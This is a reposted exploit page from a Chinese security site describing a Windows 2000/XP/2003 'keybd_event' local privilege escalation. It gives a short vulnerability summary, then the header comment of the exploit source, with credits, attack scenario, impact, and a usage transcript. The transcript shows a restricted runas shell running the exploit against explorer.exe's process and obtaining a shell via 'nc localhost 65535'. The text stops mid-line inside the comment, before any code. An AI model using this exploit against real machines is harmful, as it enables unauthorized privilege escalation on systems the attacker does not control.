Microsoft Windows "keybd_event" Local Privilege Escalation Exploit

文章整理：天天安全网   作者：佚名   发布时间：2005-09-09

漏洞资料：http://www.haxorcitos.com/MSRC-6005bgs-EN.txt
危险程度：中等
影响范围：Microsoft Windows 2000/XP/2003
解决办法：暂时没有解决方案

------------------------------------------------------------------------------

/*
* Microsoft Windows keybd_event validation vulnerability.
* Local privilege elevation
*
* Credits: Andres Tarasco ( aT4r _@_ haxorcitos.com <http://haxorcitos.com>)
* I馻ki Lopez ( ilo _@_ reversing.org <http://reversing.org> )
*
* Platforms afected/tested:
*
* - Windows 2000
* - Windows XP
* - Windows 2003
*
*
* Original Advisory: http://www.haxorcitos.com
* http://www.reversing.org
*
* Exploit Date: 08 / 06 / 2005
*
* Orignal Advisory:
* THIS PROGRAM IS FOR EDUCATIONAL PURPOSES *ONLY* IT IS PROVIDED "AS IS"
* AND WITHOUT ANY WARRANTY. COPYING, PRINTING, DISTRIBUTION, MODIFICATION
* WITHOUT PERMISSION OF THE AUTHOR IS STRICTLY PROHIBITED.
*
* Attack Scenario:
*
* a) An attacker who gains access to an unprivileged shell/application executed
* with the application runas.
* b) An attacker who gains access to a service with flags INTERACT_WITH_DESKTOP
*
* Impact:
*
* Due to an invalid keyboard input validation, its possible to send keys to any
* application of the Desktop.
* By sending some short-cut keys its possible to execute code and elevate privileges
* getting loggued user privileges and bypass runas/service security restriction.
*
* Exploit usage:
*
* C:/>whoami
* AQUARIUS/Administrador
*
* C:/>runas /user:restricted cmd.exe
* Enter the password for restricted:
* Attempting to start cmd.exe as user "AQUARIUS/restricted" ...
*
*
* Microsoft Windows 2000 [Version.00.2195]
* (C) Copyright 1985-2000 Microsoft Corp.
*
* C:/WINNT/system32>cd /
*
* C:/>whoami
* AQUARIUS/restricted
*
* C:/>tlist.exe |find "explorer.exe"
* 1140 explorer.exe Program Manager
*
* C:/>c:/keybd.exe 1140
* HANDLE Found. Attacking =)
*
* C:/>nc localhost 65535
* Microsoft Windows 2000 [Versi